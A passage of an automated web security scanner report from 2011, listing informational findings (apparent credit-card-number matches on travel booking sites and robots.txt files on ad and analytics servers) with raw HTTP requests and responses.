Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=233090271.104762655.1317599330.1317599330.1317599330.1; __utmb=233090271.1.10.1317599330; __utmc=233090271; __utmz=233090271.1317599330.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Tue, 28 Sep 2010 08:48:57 GMT
Content-Type: text/html
Expires: Sun, 02 Oct 2011 23:49:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:49:08 GMT
Content-Length: 3198
Connection: close
Vary: Accept-Encoding

<head>
<script type="text/javascript" src="/js/jquery.js"></script>
<script type="text/javascript">
function getContentCallback(ajxUrl, ajxType, ajxCache, ajxDataType, callBackSuccess,
...[SNIP]...
<!-- PTV Cache: perwinche03/10.2.53.203 Tue, 06 Apr 2010 12:01:06 GMT / 0 (0) -->

24. Credit card numbers disclosed
There are 3 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.


24.1. http://www.cheaptickets.com/shop/hotelsearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptickets.com
Path:   /shop/hotelsearch

Issue detail

The following credit card number was disclosed in the response:

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot HTTP/1.1
Host: www.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=7567558764917771317602252; NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3887845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:52:52 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMzI1NzUwfEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzg6NDUgUE18IHwg; Domain=cheaptickets.com; Expires=Wed, 02-Nov-2011 00:38:45 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:38:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:45 GMT
Content-Length: 432985


...[SNIP]...
"{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/445/21445/Holiday-Inn-Hotel-Suites-BOSTON-PEABODY-Hotel-Exterior-41-20110820-190324-704_thumb.jpg&#034;
           }
   }" />
...[SNIP]...

24.2. http://www.expedia.com/Hotel-Search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /Hotel-Search

Issue detail

The following credit card number was disclosed in the response:

Request

POST /Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL& HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Content-Length: 1082
Cache-Control: max-age=0
Origin: http://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/pubspec/scripts/eap.asp?olacid=US.BD.ORBITZ.HOTEL.HOTEL&GOTO=HotSearch&CityName=bos&InDate=10/09/2011&OutDate=10/16/2011&numroom=1&NumAdult1=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; bn_u=7520316067152911274; COOKIECHECK=1

action=hotelPackageWizard%40searchHotelOnly&packageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_inpPackageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetContro
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: iEAPID=00,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:38:31 GMT; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:38:31 GMT; Path=/
Content-Length: 606333

<!DOCTYPE html><DIV ID="interstitialServerPush1" style="display:block">

<!--Table here is required so that we can center the page in all displays-->
<table class="basicInterstialWidget" border="0
...[SNIP]...
           data-onclick="submitRDLinkAction('b7b37d4f-7c5a-4aa3-b0b7-ec2e3e153900', '496516', '456.43', '', 'qscr=rsvd&from=f&shtl=1&fgds=0&favl=0&htsd=0&flag=1&fsam=1&mony=&have=&smgt=0&htid=2558&ihtl=2&hart=4965161940127&pqar=456.43&piids=b7b37d4f-7c5a-4aa3-b0b7-ec2e3e153900&itid=&itty=&itdx=&rfrr=-56908', 'bG1udmxr', '-56908'); hrdCtrl.trackHotelClick(this,'-56908',4,'456.43','ESR','2558','N','3'); return false;">
...[SNIP]...

24.3. http://www.orbitz.com/shop/hotelsearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shop/hotelsearch

Issue detail

The following credit card number was disclosed in the response:

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=orbitz&grp=9705&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B141652382%3B20702477%3Ba%3Fhttp%3A%2F%2Fwww.orbitz.com%2Fpsi%3Ftype%3Dhotel%26market%3D%24%7Bcity%7D%2C%24%7Bcountryn%7D%26checkin%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm-dd%22%7D%26checkout%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm-dd%22%7D%26guests%3D%24%7Badults%7D%26rooms%3D%24%7Brooms%7D%26WT.mc_id%3Do_igo_merch_city_dated%26WT.mc_ev%3Dclick%26gcid%3DC11287x600-CY%24%7Bcity%7D%2C%24%7Bcountryn%7D&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=153&pos=0&aii=e3898191-1452-431e-82b6-c9f881ca9a4c&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267; adRotator=true; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:24:10 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDA2MDM3OTd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToxMDowMyBQTXwgfCA="; Version=1; Domain=orbitz.com; Max-Age=2592000; Expires=Wed, 02-Nov-2011 00:10:03 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:10:04 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:10:04 GMT
Content-Length: 249175


...[SNIP]...
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/445/21445/Holiday-Inn-Hotel-Suites-BOSTON-PEABODY-Hotel-Exterior-41-20110820-190324-704.jpg&#034;
                       }
   }" />
...[SNIP]...

25. Robots.txt file
There are 43 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


25.1. http://a.analytics.yahoo.com/fpc.pl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.analytics.yahoo.com
Path:   /fpc.pl

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.analytics.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:48:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-control: public, max-age=86400
Last-Modified: Wed, 24 Aug 2011 07:44:03 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /

25.2. http://ad-dc2.adtech.de/adperf%7C2.0%7C327%7C2812329%7C0%7C170%7CAdId=6453063

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-dc2.adtech.de
Path:   /adperf%7C2.0%7C327%7C2812329%7C0%7C170%7CAdId=6453063

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad-dc2.adtech.de

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /

25.3. http://ad.doubleclick.net/adj/cm.guardian/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.guardian/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Sun, 02 Oct 2011 23:51:36 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

25.4. http://ad.technoratimedia.com/st

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.technoratimedia.com
Path:   /st

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.technoratimedia.com

Response

HTTP/1.0 200 OK
Date: Sun, 02 Oct 2011 23:52:56 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:52:56 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

25.5. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:53:00 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

25.6. http://ad.yieldmanager.com/st

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Sun, 02 Oct 2011 23:48:54 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:48:54 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

25.7. http://ad4.liverail.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad4.liverail.com
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad4.liverail.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sun, 02 Oct 2011 23:51:35 GMT
ETag: "4195174610"
Last-Modified: Mon, 26 Sep 2011 21:54:57 GMT
Server: lighttpd/1.4.29-devel-4:6M
Content-Length: 27
Connection: Close

User-agent: *
Disallow: /


25.8. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 14:01:22 GMT
Accept-Ranges: bytes
ETag: "43bb7d451675cb1:17d7"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Sun, 02 Oct 2011 23:49:38 GMT
Connection: close

User-agent: *
Disallow: /

25.9. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812309%7C0%7C1%7CADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2812309%7C0%7C1%7CADTECH

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adserver.adtech.de

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /

25.10. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Mon, 03 Oct 2011 23:50:07 GMT
Date: Sun, 02 Oct 2011 23:50:07 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400

User-agent: *
Disallow: /

25.11. http://bcp.crwdcntrl.net/4/c=412%7Crand=756616954%7Cpv=y%7Crt=ifr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=412%7Crand=756616954%7Cpv=y%7Crt=ifr

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bcp.crwdcntrl.net

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:09 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Tue, 14 Dec 2010 16:21:02 GMT
ETag: "1930744-1a-4976134e6b780"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

25.12. http://beacon.securestudies.com/scripts/beacon.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.securestudies.com
Path:   /scripts/beacon.dll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: beacon.securestudies.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Mon, 03 Oct 2011 23:52:41 GMT
Date: Sun, 02 Oct 2011 23:52:41 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400

User-agent: *
Disallow: /

25.13. http://c.betrad.com/a/n/44/546.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /a/n/44/546.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "9152d7f1724ed8fbcd2e0c87029f193c:1276881254"
Last-Modified: Fri, 18 Jun 2010 17:14:14 GMT
Accept-Ranges: bytes
Content-Length: 25
Content-Type: text/plain
Date: Sun, 02 Oct 2011 23:51:37 GMT
Connection: close
X-N: S

User-agent: *
Disallow: /

25.14. http://cas.criteo.com/delivery/ajs.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.criteo.com
Path:   /delivery/ajs.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cas.criteo.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Sun, 02 Oct 2011 23:49:00 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

25.15. http://cdn.flashtalking.com/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.flashtalking.com
Path:   /xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.flashtalking.com

Response

HTTP/1.0 200 OK
x-amz-id-2: z88F6pWVIpUbd94kU6D7ufWeHDFBPzX7TQQmO5OMImvSrNTvpVmI0jloWHEiVW6Y
x-amz-request-id: C70663BD6E87DE03
Last-Modified: Mon, 30 May 2011 14:14:59 GMT
ETag: "668fd8017cd29b59e7d21e83b7303951"
Content-Type:
Content-Length: 41
Server: AmazonS3
Date: Sun, 02 Oct 2011 23:53:31 GMT
Connection: close

# Do not crawl
User-agent: *
Disallow: /

25.16. http://cdn.turn.com/server/ddc.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Sun, 02 Oct 2011 23:53:04 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

25.17. http://d.tradex.openx.com/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d.tradex.openx.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:00 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "3fc8fa-131-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 305
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/www/delivery/). This file is required in the
# event that you us
...[SNIP]...

25.18. http://ehg-twi.hitbox.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-twi.hitbox.com
Path:   /HG

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ehg-twi.hitbox.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:49:17 GMT
Server: Hitbox Gateway 9.3.6-rc1
Connection: close
Cache-Control: max-age=3600, private, proxy-revalidate
Expires: Mon, 03 Oct 2011 00:49:17 GMT
Content-Type: text/plain
Content-Length: 36

User-agent: *
Disallow: /Diagnostic

25.19. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 02 Oct 2011 21:00:56 GMT
Expires: Mon, 03 Oct 2011 21:00:56 GMT
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 10206

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

25.20. http://hits.guardian.co.uk/b/ss/guardiangu-football,guardiangu-network/1/H.22.1/s95621589564252

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hits.guardian.co.uk
Path:   /b/ss/guardiangu-football,guardiangu-network/1/H.22.1/s95621589564252

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: hits.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:01 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "10a342-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www78
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

25.21. http://idpix.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idpix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: idpix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"36-1274467434000"
Last-Modified: Fri, 21 May 2010 18:43:54 GMT
Content-Type: text/plain
Content-Length: 36
Date: Sun, 02 Oct 2011 23:50:11 GMT
Connection: close

# go away
User-agent: *
Disallow: /

25.22. http://kantarmedia.guardian.co.uk/RealMedia/ads/adstream.cap

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kantarmedia.guardian.co.uk
Path:   /RealMedia/ads/adstream.cap

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: kantarmedia.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jan 2008 16:38:45 GMT
ETag: "39d9bc-1a-442d407034f40"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

25.23. http://m.xp1.ru4.com/activity

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /activity

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: m.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:50:18 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/plain
Last-modified: Fri, 31 Jul 2009 18:32:10 GMT
Content-length: 26
Etag: "1a-4a7338aa"
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /

25.24. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/manchester-united/oas.html/1603912970@Top,Right1,x31,Position4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oas.guardian.co.uk
Path:   /RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/manchester-united/oas.html/1603912970@Top,Right1,x31,Position4

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oas.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jan 2008 16:38:45 GMT
ETag: "23678d-1a-442d407034f40"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

25.25. http://openx.px.invitemedia.com/openx_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://openx.px.invitemedia.com
Path:   /openx_sync

Issue detail

The web server contains a robots.txt file.

Request

